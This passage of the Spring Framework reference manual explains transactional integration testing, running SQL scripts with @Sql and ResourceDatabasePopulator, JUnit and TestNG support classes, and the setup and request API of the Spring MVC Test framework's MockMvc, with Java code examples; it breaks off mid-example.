`ApplicationContext` for the test. 
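For example, the following `@Configuration` class is a minimal sketch of one way to
satisfy that requirement; the embedded database and the bean names are illustrative
assumptions rather than requirements.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class TestConfig {

		@Bean
		public DataSource dataSource() {
			// any DataSource will do; an embedded database is convenient in tests
			return new EmbeddedDatabaseBuilder().build();
		}

		@Bean
		public PlatformTransactionManager transactionManager() {
			return new DataSourceTransactionManager(dataSource());
		}
	}
----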
In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit-based example displays a fictitious integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of the Hibernate or JPA session,\nmake sure to __flush__ the underlying session within test methods that execute that code.\nFailing to flush the underlying session can produce __false positives__: your test may\npass, but the same code throws an exception in a live, production environment. In the\nfollowing Hibernate-based example test case, one method demonstrates a false positive,\nand the other method correctly exposes the results of flushing the session. 
Note that\nthis applies to any ORM frameworks that maintain an in-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate SessionFactory sessionFactory;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate EntityManager entityManager;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<jdbc-embedded-database-support>> and <<jdbc-embedded-database-dao-testing>> for\ndetails.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. 
`ResourceDatabasePopulator` provides options for configuring the
character encoding, statement separator, comment delimiters, and error handling flags
used when parsing and executing the scripts, and each of the configuration options has
a reasonable default value. Consult the javadocs for details on default values. To
execute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either
the `populate(Connection)` method to execute the populator against a
`java.sql.Connection` or the `execute(DataSource)` method to execute the populator
against a `javax.sql.DataSource`. The following example specifies SQL scripts for a test
schema and test data, sets the statement separator to `"@@"`, and then executes the
scripts against a `DataSource`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	public void databaseTest() {
		ResourceDatabasePopulator populator = new ResourceDatabasePopulator();
		populator.addScripts(
			new ClassPathResource("test-schema.sql"),
			new ClassPathResource("test-data.sql"));
		populator.setSeparator("@@");
		populator.execute(this.dataSource);
		// execute code that uses the test schema and data
	}
----

Note that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing
and executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in
<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and
<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>
internally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs
for the various `executeSqlScript(..)` methods for further details.


[[testcontext-executing-sql-declaratively]]
===== Executing SQL scripts declaratively with `@Sql`

In addition to the aforementioned mechanisms for executing SQL scripts
_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring
TestContext Framework. Specifically, the `@Sql` annotation can be declared on a test
class or test method to configure the resource paths to SQL scripts that should be
executed against a given database either before or after an integration test method. Note
that method-level declarations override class-level declarations and that support for
`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.

*Path resource semantics*

Each path will be interpreted as a Spring `Resource`. A plain path -- for example,
`"schema.sql"` -- will be treated as a classpath resource that is _relative_ to the
package in which the test class is defined. A path starting with a slash will be treated
as an _absolute_ classpath resource, for example: `"/org/example/schema.sql"`.
A path
which references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)
will be loaded using the specified resource protocol.

The following example demonstrates how to use `@Sql` at the class level and at the method
level within a JUnit-based integration test class.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration
	@Sql("/test-schema.sql")
	public class DatabaseTests {

		@Test
		public void emptySchemaTest() {
			// execute code that uses the test schema without any test data
		}

		@Test
		@Sql({"/test-schema.sql", "/test-user-data.sql"})
		public void userTest() {
			// execute code that uses the test schema and test data
		}
	}
----

*Default script detection*

If no SQL scripts are specified, an attempt will be made to detect a _default_ script
depending on where `@Sql` is declared. If a default cannot be detected, an
`IllegalStateException` will be thrown.

* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the
	corresponding default script is `"classpath:com/example/MyTest.sql"`.
* __method-level declaration__: if the annotated test method is named `testMethod()` and is
	defined in the class `com.example.MyTest`, the corresponding default script is
	`"classpath:com/example/MyTest.testMethod.sql"`.

*Declaring multiple `@Sql` sets*

If multiple sets of SQL scripts need to be configured for a given test class or test
method but with different syntax configuration, different error handling rules, or
different execution phases per set, it is possible to declare multiple instances of
`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the
`@SqlGroup` annotation can be used as an explicit container for declaring multiple
instances of `@Sql`.

The following example demonstrates the use of `@Sql` as a repeatable annotation using
Java 8. In this scenario the `test-schema.sql` script uses a different syntax for
single-line comments.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`"))
	@Sql("/test-user-data.sql")
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

The following example is identical to the above except that the `@Sql` declarations are
grouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@SqlGroup({
		@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`")),
		@Sql("/test-user-data.sql")
	})
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

*Script execution phases*

By default, SQL scripts will be executed _before_ the corresponding test method. However,
if a particular set of scripts needs to be executed _after_ the test method -- for
example, to clean up database state -- the `executionPhase` attribute in `@Sql` can be
used as seen in the following example.
Note that `ISOLATED` and `AFTER_TEST_METHOD` are
statically imported from `SqlConfig.TransactionMode` and `Sql.ExecutionPhase`,
respectively.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "create-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED)
	)
	@Sql(
		scripts = "delete-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED),
		executionPhase = AFTER_TEST_METHOD
	)
	public void userTest() {
		// execute code that needs the test data to be committed
		// to the database outside of the test's transaction
	}
----

*Script configuration with `@SqlConfig`*

Script parsing and error handling can be configured via the `@SqlConfig` annotation.
When declared as a class-level annotation on an integration test class, `@SqlConfig`
serves as _global_ configuration for all SQL scripts within the test
class hierarchy. When declared directly via the `config` attribute of the `@Sql`
annotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared
within the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit
default value which is documented in the javadocs of the corresponding attribute. Due to
the rules defined for annotation attributes in the Java Language Specification, it is
unfortunately not possible to assign a value of `null` to an annotation attribute. Thus,
in order to support overrides of inherited global configuration, `@SqlConfig` attributes
have an explicit default value of either `""` for Strings or `DEFAULT` for Enums. This
approach allows local declarations of `@SqlConfig` to selectively override individual
attributes from global declarations of `@SqlConfig` by providing a value other than `""`
or `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`
attributes do not supply an explicit value other than `""` or `DEFAULT`. Explicit _local_
configuration therefore overrides _global_ configuration.

The configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those
supported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those
provided by the `<jdbc:initialize-database/>` XML namespace element. Consult the javadocs
of individual attributes in `@Sql` and `@SqlConfig` for details.

[[testcontext-executing-sql-declaratively-tx]]
*Transaction management for `@Sql`*

By default, the `SqlScriptsTestExecutionListener` will infer the desired transaction
semantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed
without a transaction, within an existing Spring-managed transaction -- for example, a
transaction managed by the `TransactionalTestExecutionListener` for a test annotated with
`@Transactional` -- or within an isolated transaction, depending on the configured value
of the `transactionMode` attribute in `@SqlConfig` and the presence of a
`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum,
however, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.

If the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and
`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,
you may specify explicit names via the `dataSource` and `transactionManager` attributes
of `@SqlConfig`.
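For example, the following sketch supplies explicit bean names via `@SqlConfig`; the
`testDataSource` and `testTxMgr` names are assumptions for illustration.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "/test-data.sql",
		// bean names below are hypothetical; match them to your configuration
		config = @SqlConfig(dataSource = "testDataSource", transactionManager = "testTxMgr")
	)
	public void userTest() {
		// execute code that uses the test data...
	}
----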
Furthermore, the transaction propagation behavior can be controlled via
the `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be
executed in an isolated transaction. Although a thorough discussion of all supported
options for transaction management with `@Sql` is beyond the scope of this reference
manual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide
detailed information, and the following example demonstrates a typical testing scenario
using JUnit and transactional tests with `@Sql`. Note that there is no need to clean up
the database after the `usersTest()` method is executed since any changes made to the
database (either within the test method or within the `/test-data.sql` script) will
be automatically rolled back by the `TransactionalTestExecutionListener` (see
<<testcontext-tx,transaction management>> for details).

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration(classes = TestDatabaseConfig.class)
	@Transactional
	public class TransactionalSqlScriptsTests {

		protected JdbcTemplate jdbcTemplate;

		@Autowired
		public void setDataSource(DataSource dataSource) {
			this.jdbcTemplate = new JdbcTemplate(dataSource);
		}

		@Test
		@Sql("/test-data.sql")
		public void usersTest() {
			// verify state in test database:
			assertNumUsers(2);
			// execute code that uses the test data...
		}

		protected int countRowsInTable(String tableName) {
			return JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);
		}

		protected void assertNumUsers(int expected) {
			assertEquals("Number of rows in the [user] table.", expected, countRowsInTable("user"));
		}
	}
----


[[testcontext-support-classes]]
==== TestContext Framework support classes


[[testcontext-junit4-runner]]
===== Spring JUnit Runner

The __Spring TestContext Framework__ offers full integration with JUnit 4 through a
custom runner (supported on JUnit 4.12 or higher). By annotating test classes with
`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`
variant, developers can implement standard JUnit-based unit and integration tests and
simultaneously reap the benefits of the TestContext framework such as support for loading
application contexts, dependency injection of test instances, transactional test method
execution, and so on. If you would like to use the Spring TestContext Framework with an
alternative runner such as JUnit's `Parameterized` or third-party runners such as the
`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support
for JUnit rules>> instead.

The following code listing displays the minimal requirements for configuring a test class
to run with the custom Spring `Runner`.
`@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule SPRING_CLASS_RULE = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit-based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. 
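As a minimal sketch, a subclass might look as follows; the configuration class and the
`user` table are assumptions for illustration.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration(classes = TestConfig.class)
	public class UserRepositoryIntegrationTests extends
			AbstractTransactionalJUnit4SpringContextTests {

		@Test
		public void initialState() {
			// countRowsInTable(..) is inherited convenience functionality
			// that queries via the protected jdbcTemplate
			assertEquals(0, countRowsInTable("user"));
		}
	}
----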
As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. 
It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. 
Here is a\nJUnit-based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\n\timport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\n\timport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class ExampleTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t@Test\n\t\tpublic void getAccount() throws Exception {\n\t\t\tthis.mockMvc.perform(get(\"\/accounts\/1\").accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n\t\t\t\t.andExpect(status().isOk())\n\t\t\t\t.andExpect(content().contentType(\"application\/json\"))\n\t\t\t\t.andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n\t\t}\n\n\t}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. 
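Just check the support for code completion on static members. For convenience, here is a
recap of the typical set of static imports for server-side tests; these are the imports
already named above, not additional API.

[source,java,indent=0]
----
	import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;
	import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;
	import static org.springframework.test.web.servlet.setup.MockMvcBuilders.*;
----
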
[[spring-mvc-test-server-setup-options]]
===== Setup Options
There are two main options for creating an instance of `MockMvc`.
The first is to load Spring MVC configuration through the __TestContext
framework__, which loads the Spring configuration and injects a `WebApplicationContext`
into the test, which is then used to build the `MockMvc` instance:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("my-servlet-context.xml")
	public class MyWebTests {

		@Autowired
		private WebApplicationContext wac;

		private MockMvc mockMvc;

		@Before
		public void setup() {
			this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
		}

		// ...

	}
----

The second is to simply create a controller instance manually without loading Spring
configuration. Instead, a basic default configuration, roughly comparable to that of
the MVC JavaConfig or the MVC namespace, is automatically created and can be customized
to a degree:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyWebTests {

		private MockMvc mockMvc;

		@Before
		public void setup() {
			this.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();
		}

		// ...

	}
----

Which setup option should you use?

The __"webAppContextSetup"__ loads your actual Spring MVC configuration, resulting in a
more complete integration test. Since the __TestContext framework__ caches the loaded
Spring configuration, it helps keep tests running fast, even as you introduce more tests
in your test suite. Furthermore, you can inject mock services into controllers through
Spring configuration in order to remain focused on testing the web layer. Here is an
example of declaring a mock service with Mockito:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="accountService" class="org.mockito.Mockito" factory-method="mock">
		<constructor-arg value="org.example.AccountService"/>
	</bean>
----

You can then inject the mock service into the test in order to set up and verify
expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("test-servlet-context.xml")
	public class AccountTests {

		@Autowired
		private WebApplicationContext wac;

		private MockMvc mockMvc;

		@Autowired
		private AccountService accountService;

		// ...

	}
----
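
For instance, a brief sketch of stubbing and verifying such expectations with Mockito
(the `AccountService#getAccount(long)` signature and the `Account` type are hypothetical;
the static methods come from `org.mockito.Mockito`):

[source,java,indent=0]
----
	@Before
	public void setup() {
		// Reset the shared mock between tests: the context, and thus the mock, is cached.
		Mockito.reset(this.accountService);
		this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
	}

	@Test
	public void getAccount() throws Exception {
		Mockito.when(this.accountService.getAccount(1L)).thenReturn(new Account(1L, "Lee"));
		this.mockMvc.perform(get("/accounts/1")).andExpect(status().isOk());
		Mockito.verify(this.accountService).getAccount(1L);
	}
----
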
However, using the \"standaloneSetup\" does imply the need for additional\n\"webAppContextSetup\" tests in order to verify your Spring MVC configuration.\nAlternatively, you may choose to write all tests with \"webAppContextSetup\" in order to\nalways test against your actual Spring MVC configuration.\n\n[[spring-mvc-test-server-performing-requests]]\n===== Performing Requests\nIt's easy to perform requests using any HTTP method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/hotels\/{id}\", 42).accept(MediaType.APPLICATION_JSON));\n----\n\nYou can also perform file upload requests that internally use\n`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart\nrequest but rather you have to set it up:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(fileUpload(\"\/doc\").file(\"a1\", \"ABC\".getBytes(\"UTF-8\")));\n----\n\nYou can specify query parameters in URI template style:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels?foo={foo}\", \"bar\"));\n----\n\nOr you can add Servlet request parameters representing either query of form parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels\").param(\"foo\", \"bar\"));\n----\n\nIf application code relies on Servlet request parameters and doesn't check the query\nstring explicitly (as is most often the case) then it doesn't matter which option you use.\nKeep in mind however that query params provided with the URI template will be decoded while\nrequest parameters provided through the `param(...)` method are expected to already be decoded.\n\nIn most cases it's preferable to leave out the context path and the Servlet path from\nthe request URI. If you must test with the full request URI, be sure to set the\n`contextPath` and `servletPath` accordingly so that request mappings will work:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/app\/main\/hotels\/{id}\").contextPath(\"\/app\").servletPath(\"\/main\"))\n----\n\nLooking at the above example, it would be cumbersome to set the contextPath and\nservletPath with every performed request. Instead you can set up default request\nproperties:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class 